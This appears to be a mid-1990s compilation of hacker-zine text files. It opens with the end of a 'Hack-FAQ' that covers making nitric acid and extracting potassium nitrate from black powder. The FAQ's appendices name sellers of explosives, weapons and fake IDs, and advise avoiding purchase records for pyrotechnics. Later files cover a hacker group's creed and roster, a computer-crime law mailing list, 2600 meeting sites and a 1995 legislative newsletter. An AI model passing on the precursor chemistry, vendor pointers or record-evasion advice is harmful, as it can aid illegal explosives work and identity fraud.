CAUTION: If the acid is heated too strongly, the nitric acid will decompose as soon as it is formed. This can result in the production of highly flammable and toxic gasses that may explode. It is a good idea to set the above apparatus up, and then get away from it. Potassium nitrate could also be obtained from store-bought black powder, simply by dissolving black powder in boiling water and filtering out the sulfur and charcoal. 
To obtain 68 g of potassium nitrate, it would be necessary to dissolve about 90 g of black powder in about one litre of boiling water. Filter the dissolved solution through filter paper in a funnel into a jar until the liquid that pours through is clear. The charcoal and sulfur in black powder are insoluble in water, and so when the solution of water is allowed to evaporate, potassium nitrate will be left in the jar. ================================================================= ==== XI. 'Cyberpunk'/Futuristic/Underground Culture "Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds. Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world." --Unknown That is the attitude of many of the people who, knowingly or not, are members of this hyped culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. ================================================================= ==== Appendix A. FTP sites with useful info: ftp.eff.org wiretap.spies.com hpacv.com (mail postmaster@hpacv.com for info phirst) phred.pc.cc.cmu.edu quartz.rutgers.edu uglymouse.css.itd.umich.edu grind.isca.uiowa.edu zero.cypher.com cert.sei.cmu.edu plains.nodak.edu etext.archive.umich.edu ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/ black.ox.ac.uk Dictionaries ftp.win.tue.nl world.std.com clr.nmsu.edu glis.cr.usgs.gov \ These two sites will give you martini.eecs.umich.edu 3000 / whatever info you need about any city. 
=====================================================================

Appendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================

Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith

Also try IRC #hack.   *** WARNING: May be lame at times!!! ***

=====================================================================

Appendix D. Publications and Catalogs

2600 - a technical journal put out by hackers

mail:  2600                        email: 2600@well.sf.ca.us
       PO Box 752
       Middle Island, NY 11953
       PH: 516-751-2600

---------------------------------------------------------------------

PHRACK

The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

---------------------------------------------------------------------

Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.

Davis, Tenney L.: "Chemistry of Powder and Explosives."

Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)

Russell: "Computer Security Basics"

Cornwall: "The (New) Hacker's Handbook"

"Cyberpunk" (forget the authors)

---------------------------------------------------------------------

Lockpicks
(from Belisarius)

American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062

Lock Pick Sets
--------------
Novice ($32.50):   11 pix, tension wrenches and a broken key extractor.
                   Pouch.
Deluxe ($54.60):   16 pix, wrenches, extractor. Pocket size leather
                   case.
Superior ($79.80): 32 pix, wrenches, extractor. Hand finished leather
                   case.
----------------------------------------------------------------- ---- Explosives and other underground stuff Loompanics is one of the major distributers of material relating to the underground including explosives. You can get the catalogue by mailing: Loompanics Unlim P.O. Box 1197 Port Townsend, Wash 98368 ----------------------------------------------------------------- ---- Fake IDs, Technical Manuals on almost anything (from CyberSorceror) NIC/LAW ENFORCEMENT SUPPLY 500 Flournoy Lucas Road/Building #3 Post Office Box 5950 Shreveport, LA 71135-5950 Phone: (318) 688-1365 FAX: (318) 688-1367 NIC offers ids of ALL types just about, as well as how-to manuals on EVERYTHING, posters, lock stuff, electronic sureillance stuff. ----------------------------------------------------------------- ---- Weapons, explosives, survival gear. (from CyberSorceror) Phoenix Systems, INC. P.O. Box 3339 Evergreen, CO 80439 (303) 277-0305 Phoenix offers explosives, grenade launchers, incendiaries, tear gas grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000 volts, ballistic knives and maces(battering), armored personnel carriers, saps/batons, booby traps, envelope clearing chemicals .. turns envelopes transparent until it dries and leaves no marks (used by postal service and FBI), survival stuff, radiation pills, gasoline stabilizers for long term storage, emergency supplies, etc, more how-to books on more illegal stuff than you'd ever have time to read. ----------------------------------------------------------------- ---- Chemicals and lab equipment!! Only requires SIGNATURE for proof of age! (from Neurophyre) Hagenow Laboratories, Inc. 1302 Washington St. Manitowoc, WI 54220 Send a crisp $1 bill and a request for a catalog. Tip: Don't order all your pyro stuff from here. They DO keep records. Be safe. ================================================================= ==== Appendix E. 
PGP keys

Belisarius: [PGP public key block, Version 2.2]

Neurophyre: [PGP public key block, Version 2.3]

=====================================================================

*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy's plans and you will know ******
*****   which strategy will be successful and which will not.  ******
*****                -- Sun Tzu, The Art of War                ******
*********************************************************************
*********************************************************************

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #3 of 9

The Pursuit of Knowledge
Notes on The Guild

by Route
9/11/95

You may have been hearing much clamor about the Guild as of late.
Maybe you haven't. It depends what circles you hang out in. This
article is here to tell you who we are and dispel any myths that may
be floating around.

[OverView]

Just what is the Guild? The Guild is a group of individuals that are,
quite simply, dedicated to the pursuit of knowledge. I started the
group (see AKA's, below) as a pet project with a friend of mine
(Nihil). Actually, I started the group as a response to several offers
to join other existing groups.
I felt uneasy about most of them, and decided to go out on my own, and
do things the way *I* wanted, the first time. The result is the Guild.

At the time of this writing there are 10 members in the group. We have
had a few members step down, and one who actually just disappeared. We
have even had one person declare a vendetta against me and the Guild
for his denial of acceptance.

[Members]

Some of us are very vocal and 'high profile'. Some of us are not. Some
of us are constant alt.2600 denizens. Some of us do not wish to wade
through such a high traffic group, and prefer others. Some of us only
get online to check email. Some of us are industry professionals, some
of us are students. Some are both. We are of all different
backgrounds, talents and interests. The diversity is the beauty of it
all. If we all came from the same walks of life, did the same things,
and liked the same things, we'd be pretty useless as a group (we'd
also be pretty boring). The fact that we are so diverse and the fact
that we *can* organize under a common goal is saying something right
there.

To become a Guild member, all one has to do is fill out the
application you will find at my ftpsite (see URL's below). It is then
voted on by all the current members (Founding members get two votes).
We are rather discriminating, and turn down many people. We do not
wish to get too large, and we do not wish to induct just anyone. It's
hard to put a qualifier on just what we are looking for in members.
It's partly what hard facts we see on the app, and partly gut feeling.
If you are serious, feel free to fill one out, we are always glad to
see new applications.

[Axioms]

The creeds we gather under are the following, in order:

1) The pursuit of knowledge
        The active and absolute pursuit of gainful and enlightening
        information.

2) The right to privacy
        The right to be left alone, the right to actively pursue this
        privacy through encryption, obscurity, or whatever means
        necessary.
3) The right of individualism
        The right to stand out in a crowd and show that you are
        different, and proud of it. Also, the right to stand on your
        own, take responsibility for yourself, and not drop a dime on
        your friends and peers, should a three-letter agency press
        you.

4) The destruction of ignorance
        The dissemination, through discretion, of the acquired
        knowledge. The correcting of obvious wrongs of others, and the
        ability to concede that you were wrong after evidential proof
        of falsehood is provided.

5) The support of fellow members
        The supporting, through whatever means necessary, of fellow
        members of the Guild.

[Goals and Views]

What are ends to which we gather under? It was my original goal to get
a bunch of people with similar interests together and exchange
thoughts and ideas. That was my original intent. It has grown beyond
that. These past few months have changed my original vision into
something much grander. Being in the Guild means something. It is
being able to rely on a group of adroit people to help you out of a
situation; whether it be a bit of code you can't quite seem to get to
compile, or a pesky usenet denizen who won't leave you alone. Being in
the Guild is knowing you have some friends out there in cyberspace.
Friends you can count on. That's what it comes down to.

One of my personal opinions is one of Freedom of Information.
Information, in its raw and pure form, wants to be free. I am
completely hypocritical, however. I also believe in the right to
privacy. How do I justify one to the other? It's my belief that
information *does* want to be free. It tries its hardest to be widely
recognizable and distributable. It doesn't hide. If you have
information you want kept secret, it's *your* responsibility to make
*sure* it *becomes* secret, and *stays* secret. If there is
information I really want private *I* make sure it stays private. I am
charged with its secrecy.
If it was discovered by a hacker, or by some other means, it's *my*
fault for not clipping its wings well enough...so to speak...
Cryptography is the great enemy of Freedom of Information. It does a
damn good job of keeping it secure (if implemented correctly). So, to
sum it up, I am a firm advocate of both the Right to Privacy, and the
Freedom of Information. It all depends on what the content is, and how
much you want it secured (how well you can crush its natural desire to
be free).

[What we AREN'T]

In lieu of recent events, some people may have been confused as to
what we are and what we aren't. You should have a pretty decent idea
of what we are. Here's a couple things we AREN'T:

  An information-leeching organization that is only here to gather up
  'good stuff' that we couldn't get individually.

  Into carding, phreaking, or warez. Translated: we aren't into
  getting arrested.

  Advocates of mailbombing, usenet spamming, mass mailing-list
  subscriptions, etc.

Personally, I find certain denial of service attacks rather
interesting. I keep my interests confined to my own networks and
computers, however. If I crash my own computers, it's my business. If
I crash someone else's that's fucked up. We don't do that. It's
childish and inconsiderate, to say the least.

[The Infinity Concept]

The Infinity Concept is our electronic zine. We try to publish it
seasonally...We try that is....It is the personification of creeds 1
and 4. It is our way of widely disseminating information and acquired
knowledge. Our next issue should be out by mid-October. It can be
found at any of our URL's...

[AKA's]

This roster is current as of 9/4/95

Name        AKA                    Address                      Joined
---------------------------------------------------------------------
Route       (Infinity)             daemon9@netcom.com           Founding
Nihil       (Scribe)               nihil@nwlink.com             Founding
Carbonboy   (Scott Walters)        carbon@inforamp.net          May 1995
Squidge     (Timothy R. Matthews)  T.R.Matthews@bradford.ac.uk  June 1995
Mythrandir  (Jeff Thompson)        jwthomp@uiuc.edu             June 1995
deliryum    (Deliryum)             deliryum@cdc.net             July 1995
Alhambra    (Jeremy Rauch)         alhambra@jhu.edu             July 1995
MrZippy     (Robert Fries)         rpfries@interaccess.com      July 1995
Cheshire    (Justin Larue)         cheshire@nether.net          Aug 1995

[URL's]

url ftp://ftp.netcom.com/pub/da/daemon9/"__the Guild__"
url http://homepage.interaccess.com/~rpfries

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #4 of 9

L A C C

Legal Aspects of Computer Crime

"echo subscribe lacc|mail lacc-request@suburbia.net"

REASONS FOR INCEPTION
---------------------

The growing infusion of computers and computing devices into society
created a legislative and common law vacuum in the 1980's. State
prosecutors attempted to apply traditional property protection and
deception laws to new technological crimes. By and large they were
successful in this endeavor. There were however a very few but well
publicized failed cases against computer "hackers" (most notable R vs
Gold - UK House of Lords).

In an atmosphere of increased government reliance on computer
databases and public fear and hostility towards computerization of the
workplace, the world's legislatures rushed to criminalize certain
types of computer use. Instead of expanding the scope of existing
legislation to more fully encompass the use of computers by criminals,
changing phrases such as "utter or write" to "utter, write or
transmit" (the former being the prosecution's undoing in the well
publicized Gold case) as had been done with the computerization of
copyright law, an entirely new class of criminal conduct was
introduced. The computer had been seen not just as another tool that
criminals might use in committing a crime but something altogether
foreign and removed from the rest of society and established Law.
The result was a series of naively drafted, overly broad and
under-defined statutes which criminalized nearly all aspects of
computer use under certain conditions.

In the 1990's a fundamental and evolving shift in computer usage has
started to occur. At work it is rare now to see a white collar worker
not in the possession of a computer. At home over one third of
households have computer systems. The computer is no longer the
"altogether foreign and removed from the rest of society" device it
once was. It has come out of the domain of the technical specialist
and into the main stream. Even our notoriously slow moving legal
profession is adopting it as an essential tool.

But there is another change. A qualitative one important to our
discussion. When you connect hundreds of thousands of computers and
thus the people that use them together you find something remarkable
occurs. An event that you could never have predicted by merely summing
the discrete components involved. A unique virtual society forms.
Despite being designed with computer networking in mind computer crime
legislation copes very poorly with non homogeneous authorization.

Societies are based around a common knowledge of history, beliefs, and
current events. Each member of a society can be pinpointed as
belonging to the society in question by the ideas, beliefs and
knowledge they hold in common with its other members. Any new member
to a society learns this knowledge only because it is passed onto
them; directly by other members or indirectly via its media, works of
literature or observation.

Successful large scale computer networks like the Internet form for
one reason and one reason only; information sharing. When a critical
mass of diversity, interests, user population and information exchange
is reached, a situation develops that mirrors in all important aspects
a vibrant and evolving society.
Members of these computer network societies have nearly equal ability
to convey their thoughts to other members and do so in a timely manner
without unwanted distortion. This is a remarkably democratic process
compared to the very real self censorship and top heavy direction that
is so manifest in traditional broadcast and publishing industries. But
unlike the physical societies that have hitherto been the norm, the
electronic network society is not isolationist. It continues to draw
from, mesh and feed its beliefs into the traditional societies it was
populated out of.

This coupling process between computer networks and traditional
societies is expected to continue - at least for English speaking
countries, until a stage is reached where it is difficult to find any
boundary between the two. The majority of citizens will then fall most
completely under the gamut of the appallingly drafted computer crimes
legislation many times every day of their lives.

In the vast majority of legislation directed to address computer crime
everything which can be performed on a computer unless "authorized" is
defined as illegal. Granted an individual can authorize themselves to
do anything they wish with their own computer, but in a networked
topology a typical computer user may use or otherwise interact with
hundreds or even thousands of other people's computers in any given
day. In Law it has previously been the case that that which was not
expressly forbidden was permitted. Currently the digital equivalent of
moving a chair is illegal and carries with it in most countries a 5 to
10 year prison term. It is a sad reflection on the legislature of the
day that the computer medium was criminalized rather than the intent
or damage to the victim.

It is unlikely that law reform will occur until current political
concern over computer networks such as the Internet is moderated.
If anything the push so far from political drafters has been to once
again introduce brand new medium criminalizing legislation rather than
revitalizing the existing codes. This unfortunate "labeled arrow"
approach will continue as long as there exists an ill informed and
technologically ignorant legislature that finds itself pliant to the
whims of sensationalist media and honed to their dubious targets.

So ill defined and over broad are the terms used in computer crime
legislation that in most western countries pressing a button on a
silicon wrist watch without permission can be construed as "insertion
of data into a computer without authority" an offence which carries 10
years penalty in some countries.

It is however within the above unfortunate lack of appropriate
legislation, precedents and judicial guidance that judiciary,
practitioners, prosecutors, law enforcement personnel and drafters of
future codes have to struggle to find resolution.

This list has been created in an attempt to mitigate the lack of
tangible resources people involved with computer crime have at their
disposal. It is hoped that by bringing knowledgeable legal
professionals together with para-legal personnel and informed lay
persons that information and resources relevant to the difficult task
of analyzing, presenting in court or otherwise dealing with computer
crime law and computer crimes may be shared and intelligent discussion
stimulated.

nb. this list is also an appropriate forum to discuss computerized
legal, law enforcement and criminology databases, such as Netmap,
Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera.

GUIDELINES
----------

In order to keep the semantic content high on this list, please
consult the following before posting:

DO POST
-------
Un/reported decisions.
Commentaries on cases.
Reviews on relevant books.
Relevant journal articles.
Information about proposed legislation.
Full text of CC legislation.
Judicially defined terms.
Articles on new arrests or cases.
Detailed questions.
Intelligent commentary.
Personal experiences with computer crime.
Very well thought out analogies.
Relevant transcripts.
Defence or prosecution strategy.
Relevant papers, thesis.
Conference announcements and details.
Locations of legal resources.
Computer forensics information.
Trial/court dates, verdicts etc.
Reviews of legal software.
Pointers to any of the above.
Cross post relevant information from other lists or news groups.
Relevant affidavits, court documents.

DON'T POST
----------
Personal insults.
Signatures >4 lines.
Quoted replies with more than 30% quoted from the original.
Short questions, or questions which otherwise do not convey useful
  information in their own right.
Gossip about the moderator.
Articles about computer (in)security, they should be sent to:
  "best-of-security@suburbia.net"
"breaking into a computer is the same as...."
Petitions (if you think they are exceptionally relevant, send them to
  the moderator, who may post them).
Chain letters.
Advertising material.
Ethical considerations that are only "opinion".
Content free news reports or articles.
Abusive, antagonistic or otherwise, non information rich or
  constructive phrases.
Quotes from Dan Quayle.

SUBSCRIBING
-----------

Send mail to:

        lacc-request@suburbia.net

with the body of:

        subscribe lacc

UNSUBSCRIBING
-------------

Send mail to:

        lacc-request@suburbia.net

with the body of:

        unsubscribe lacc

POSTING
-------

To send a message to the list, address it to:

        lacc@suburbia.net

REPLYING
--------

If you are replying to a message already on the LACC list using your
mail program's reply facility you will almost certainly have to change
the reply address to lacc@suburbia.net. This is because the LACC
mailing list program is configured to have return replies sent to
"nobody" in order to avoid receiving the replies of "vacation"
programs which automatically send email saying "I've gone to the moon
for two weeks to hunt rare bits".
--
+----------------------+-----------------------------------------+
| Julian Assange       | "if you think the United States has     |
|                      |  stood still, who built the largest     |
| proff@suburbia.net   |  shopping centre in the world?" - Nixon |
+----------------------+-----------------------------------------+

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #5 of 9

2600 MEETINGS

North America

Ann Arbor, MI
    Galleria on South University.

Austin
    Northcross Mall, across the skating rink from the food court,
    next to Pipe World.

Baltimore
    Baltimore Inner Harbor, Harborplace Food Court, Second Floor,
    across from the Newscenter. Payphone: (410) 547-9361.

Baton Rouge, LA
    In The LSU Union Building, between the Tiger Pause and Swensen's
    Ice Cream, next to the payphone. Payphone numbers: (504) 387-9520,
    9538, 9618, 9722, 9733, 9735.

Bloomington, MN
    Mall of America, north side food court, across from Burger King
    and the bank of payphones that don't take incoming calls.

Boise, ID
    Student Union building at Boise State University near payphones.
    Payphone number: (208) 342-9432, 9559, 9700, 9798.

Boston, MA
    Prudential Center Plaza, Terrace Food Court. Payphones: (617)
    236-6582, 6583, 6584, 6585.

Chicago, IL
    3rd Coast Cafe, 1260 North Dearborn.

Cincinnati
    Kenwood Town Center, food court.

Clearwater, FL
    Clearwater Mall, near the food court. Payphones: (813) 796-9706,
    9707, 9708, 9813.

Cleveland
    CoventryAraica in Cleveland Heights.

Dallas
    Mama's Pizza, northeast corner of Campbell Rd. and Preston Rd. in
    North Dallas, first floor of the two story strip section. 7pm.
    Payphone: (214) 931-3850.

Danbury, CT
    Danbury Fair Mall, off Exit 4 of I-84, in food court. Payphones:
    (203) 748-9995.

Hazelton, PA
    Lural Mall in the new section by phones. Payphones: (717)
    454-9236, 9246, 9365.

Houston
    Galleria Mall, 2nd story overlooking the skating rink.

Kansas City
    Food Court at the Oak Park Mall in Overland Park, Kansas.
Los Angeles
    Union Station, corner of Macy & Alameda. Inside main entrance by
    bank of phones. Payphones: (213) 972-9358, 9388, 9506, 9519, 9520;
    625-9923, 9924; 614-9849, 9872, 9918, 9926.

Louisville, KY
    The Mall, St. Matthew's food court.

Madison, WI
    Union South (227 S. Randall St.) on the main level by the
    payphones. Payphones: (608) 251-9746, 9914, 9916, 9923.

Nashville
    Bellevue Mall in Bellevue, in the food court.

New York City
    Citicorp Center, in the lobby, near the payphones, 153 E 53rd St.,
    between Lexington & 3rd. Payphones: (212) 223-9011, 8927;
    308-8044, 8162.

Ottawa, ONT (Canada)
    Cafe Wim on Sussex, a block down from Rideau Street. 7pm.

Philadelphia
    30th Street Amtrak Station at 30th & Market, under the "Stairwell
    7" sign. Payphones: (215) 222-9880, 9681, 9779, 9799, 9632;
    387-9751.

Pittsburgh
    Parkway Center Mall, south of downtown, on Route 279. In the food
    court. Payphone: (412) 928-9926, 9927, 9934.

Portland, OR
    Lloyd Center Mall, second level at the food court.

Poughkeepsie, NY
    South Hills Mall, off Route 9. By the payphones in front of Radio
    Shack, next to the food court.

Raleigh, NC
    Crabtree Valley Mall, food court.

Rochester, NY
    Marketplace Mall food court.

St. Louis
    Galleria, Highway 40 and Brentwood, lower level, food court area,
    by the theatres.

Sacramento
    Downtown Plaza food court, upstairs by the theatre. Payphones:
    (916) 442-9543, 9644.

San Francisco
    4 Embarcadero Plaza (inside). Payphones: (415) 398-9803, 9804,
    9805, 9806.

Seattle
    Washington State Convention Center, first floor. Payphones: (206)
    220-9774, 9775, 9776, 9777.

Washington DC
    Pentagon City Mall in the food court.

Europe & South America

Buenos Aires, Argentina
    In the bar at San Jose 05.

London, England
    Trocadero Shopping Center (near Picadilly Circus) next to VR
    machines. 7pm to 8pm.

Munich, Germany
    Hauptbahnhof (Central Station), first floor, by Burger King and
    the payphones. (One stop on the S-Bahn from Hackerbruecke -
    Hackerbridge!) Birthplace of Hacker-Pschorr beer.
    Payphones: +49-89-591-835, +49-89-558-541, 542, 543, 544, 545.

Granada, Spain
    At Kiwi Pub in Pedro Antonio de Alarcore Street.

Halmstad, Sweden
    At the end of the town square (Stora Torget), to the right of the bakery (Tre Hjartan). At the payphones.

All meetings take place on the first Friday of the month from approximately 5pm to 8pm local time unless otherwise noted. To start a meeting in your city, leave a message and phone number at (516) 751-2600, or send email to: meetings@2600.com

This PHiLe courtesy of the 2600 Web Site

FuSIoN

------------------------------------------------------------------------------
T H E  C R i M E  S Y N D i C A T E   NPi/TcS/SUi

fu-sion \'fyu-zhen\ n, the union of atomic nuclei resulting in the release of enormous quantities of energy when certain light elements unite.
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #6 of 9

===========================================================================
BillWatch 18

VTW BillWatch: A weekly newsletter tracking US Federal legislation affecting civil liberties. BillWatch is published every Friday evening as long as Congress is in session.

Congress is: in session

Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995

Please widely redistribute this document with this banner intact
Redistribute no more than two weeks after above date
Reproduce this alert only in relevant forums

Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
___________________________________________________________________________
TABLE OF CONTENTS

    '-' denotes quiet issue (no movement this week)
    '+' denotes movement this week on an issue
    '++' denotes movement this week with an action for YOU to do

+   Summary of Internet Censorship legislation
+   Changes in US policy on cryptography
        Review of workshop at NIST Sep 15th
        Text of ACLU position on encryption
        Status: "Clipper II" ramrodding is progressing
-   HR1978, S n.a.
        (Internet Freedom and Family Empowerment Act)
        Status: In conference
-   HR1004, S314 (1995 Communications Decency Act)
        Status: In conference
-   HR n.a., S714 (Child Protection, User Empowerment, and Free Expression in Interactive Media Study Act)
        Status: In conference
-   Last-minute provisions of the Manager's Mark amendment to HR1555
        Status: In conference
-   HR n.a., S892 (Protection of Children from Computer Pornography Act)
        Status: In committee
-   HR n.a., S974 (Anti-Electronic Racketeering Act)
        Status: In committee
+   HR n.a., S1237 (Child Pornography Prevention Act)
        Text of S1237
        Statement of introduction of S1237 (Hatch)
        Status: In committee (Judiciary)
-   Subscription Information
___________________________________________________________________________
SUMMARY OF INTERNET CENSORSHIP LEGISLATION

The four different pieces of legislation that address Internet regulation are still waiting for conference committee consideration. With the budget as the current Congressional priority, it isn't likely the fate of the Internet will be considered for several weeks.

VTW is still collecting the signatures of businesses and bulletin boards that wish to participate in the joint letter to be sent to Congress urging parental control (instead of censorship) as a means of approaching the Internet.

VTW urges you to contact your Internet service provider, along with any business that uses the Internet, to sign on to this letter. Details can be found at http://www.vtw.org/cdaletter/ or by sending mail to vtw@vtw.org with "send cdaletter" in the subject line.
___________________________________________________________________________
CHANGES IN US CRYPTOGRAPHY POLICY

VTW has been chronicling the government's attempts at forcing Clipper II onto the public and industry. Of course, it is still extremely unpopular. At the Sep.
6th and 7th NIST workshop, industry and public interest groups panned the plan, and small working groups set up by NIST to evaluate the criteria unhappily participated, even openly revolting in some instances.

On Sep 15th, NIST held another workshop to discuss the FIPS (Federal Information Processing Standard) that would embody Clipper II (also known as Commercial Key Escrow). Believe it or not, this meeting was not a repeat of the Sep 6th/7th meeting. Several attendees noticed significant differences:

HEIGHTENED GOVERNMENT PRESENCE

At the Sep 6th/7th workshop, dissent among industry and public representatives interfered with NIST's attempts at having a discussion about the specifics of Clipper II. Simply put, industry and the public advocates didn't like the plan. Therefore discussions of the details were fruitless. One smaller working group simply refused to work on the details and issued a statement condemning the whole Clipper II plan.

The government upped the number of Federal participants at the Sep. 15th meeting in order to prevent the repeat of such an event. Several public advocates noticed a high percentage of government-provided participants in the working groups. One civil liberties advocate noted that he had never seen so many NSA individuals identifying themselves in public before.

Needless to say, the tactic worked. Little in the way of opposition to the plan was voiced.

BURNOUT AMONG INDUSTRY AND PUBLIC REPRESENTATIVES

Having been through this Kafka-esque exercise a mere two years ago with the original Clipper plan, industry and public advocates are showing signs of burnout. It's fairly clear that their concerns are not being listened to.

Both the public and the industry clearly sent a message to the Clinton Administration when the original Clipper was proposed. Said F. Lynn McNulty of NIST in the New York Times Magazine (6/12/94), "We received 320 comments, only 2 of which were supportive."

NIST made the Clipper Chip a government standard anyway, and it flopped in the marketplace. How many of those Clipper-phones do you see running around? The government's so-called "stupid criminals" are just falling over themselves to buy them, aren't they?

NIST has stated that it has already been decided to make Clipper II a standard, before receiving any public input. Is this how democracy is supposed to work?

COMMERCIAL CHEERLEADING FROM SELECT INDUSTRY INDIVIDUALS

If you're wondering how the Clinton administration can get away with pushing such a disastrous proposal again, look no further than select members of the hardware and software industry.

Several companies that make both security software, hardware devices and several key escrow companies are pushing Clipper II because they incorrectly believe that the government will not make it mandatory, and because they believe the industry wants key escrow.

VTW believes they have it half-right: industry wants key escrow, though not on the Clinton Administration's terms. It is clear, however, that the Administration will not allow key-escrow to be a voluntary program.

The EPIC (Electronic Privacy Information Center) has proved that the government has enough common sense to know that key escrow is going to be unpopular and will have to be forced on the marketplace. (See FOIA'd documents at URL:http://www.epic.org/crypto/).

Nevertheless, several companies who want to produce hardware key escrowed devices, key escrowed software, and become escrow holders have become the champions of the Clipper II (Commercial Key Escrow) program. With their support, VTW predicts that the Clinton Administration will ratify Clipper II as a FIPS standard over the objections of industry and public.

Stay tuned to BillWatch for progress on Clipper II.
___________________________________________________________________________
Internet Freedom and Family Empowerment Act (HR 1978, S n.a.)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
    HR 1978 is an attempt to recognize the unique medium that is online systems and avoid legislating censorship. It would:
    - prohibit the FCC from regulating constitutionally-protected online speech
    - absolve sysops and services from liability if they take good faith measures to screen their content or provide parental-screening software

    See directions below for obtaining analyses from various organizations.

House sponsors and cosponsors:
    Cox (R-CA), Wyden (D-OR), Matsui (D-CA), White (R-WA), Stupak (D-MI), Rohrabacher (R-CA)

House status:
    HR 1978 was passed 8/4/95 by the House in a vote (421-4).

Where to get more info:
    Email:  vtw@vtw.org (with "send hr1978" in the subject line)
    Gopher: gopher -p 1/vtw/exon gopher.panix.com
    WWW:    http://www.panix.com/vtw/exon
___________________________________________________________________________
1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
    The CDA would criminalize electronic speech currently protected in print by the First Amendment.

House CDA sponsors:
    Johnson (D-SD)

House status:
    HR1004 will probably never leave committee.

Senate status:
    The Senate affirmed the Communications Decency Act (84-16) as amended to the Telecommunications Reform bill (S 652).

Where to get more info:
    WWW:    http://www.panix.com/vtw/exon
            http://www.eff.org/
            http://www.cdt.org/
            http://epic.org/free_speech
    Gopher: gopher -p 1/vtw/exon gopher.panix.com
            gopher gopher.eff.org
    Email:  vtw@vtw.org (with "send cdafaq" in the subject line)
            cda-status@cdt.org
            cda-info@cdt.org
___________________________________________________________________________
Child Protection, User Empowerment, and Free Expression in Interactive Media Study Act (Amendment to HR1555 in the House, S 714)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
    Would direct the Department of Justice to study whether current law is sufficient to cover enforcement of existing obscenity laws on computer networks.

Senate sponsors:
    Leahy (D-VT)

Senate status:
    Currently unattached to any legislation; attempted attachment to S.652 but failed (6/14/95).

House sponsors:
    Klink (D-PA)

House status:
    Amended to HR 1555 in committee.
___________________________________________________________________________
Last-minute provisions of the Manager's Mark amendment to HR1555 (added to HR1555 at the last minute)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
    Criminalizes many forms of constitutionally-protected speech when they are expressed online.

House sponsors:
    Unknown

House status:
    Amended to HR 1555 through the Manager's Mark on 8/4/95.
___________________________________________________________________________
1995 Protection of Children from Computer Pornography Act (S 892)

Description:
    Would make Internet Service Providers liable for shielding people under 18 from all indecent content on the Internet.

Senate sponsors:
    Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY), Shelby (R-AL), Nickles (R-OK), Hatch (R-UT)

Senate status:
    A hearing was held Monday July 24th. No action on the bill has happened yet as a result of that hearing.
___________________________________________________________________________
Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974)

Description:
    S 974 has many effects (not good) on law enforcement's use of intercepted communications. It would also make it unlawful for any person to publicly disseminate encoding or encrypting software including software *currently allowed* to be exported unless it contained a "universal decoding device". This more than likely means that Clipper-style key escrow systems could be disseminated, but not strong, private cryptography.

Senate sponsors:
    Grassley (R-IA)

Senate status:
    Currently not active and probably won't move before the August recess.

Senate citizen action required:
    Request bill below and familiarize yourself with it. VTW is tracking this bill, and will alert you when there is movement. There is no Congressional action to take right now; as other bills (such as the Communications Decency Act) pose a greater, more immediate threat.

House of Representatives status:
    No House version is currently enrolled.

Where to get more info:
    Email:  vtw@vtw.org (with "send s974" in the subject line)
    Gopher: URL:gopher://gopher.panix.com:70/11/vtw/
___________________________________________________________________________
Child Pornography Prevention Act of 1995 (HR n.a., S 1237)

Description:
    S 1237 would criminalize material that depicts children engaging in sexually-explicit conduct whether or not the material was produced with children or entirely without computer.

Senate sponsors:
    Hatch (R-UT), Abraham (R-MI), Grassley (R-IA), Thurmond (R-SC)

Senate status:
    In the Judiciary committee, no hearing has been held yet.

Senate citizen action required:
    Read the bill below and familiarize yourself with it. VTW is tracking this bill, and will alert you when there is movement.

House of Representatives status:
    No House version is currently enrolled.

Where to get more info:
    Check URL:http://thomas.loc.gov and search for bill S1237.
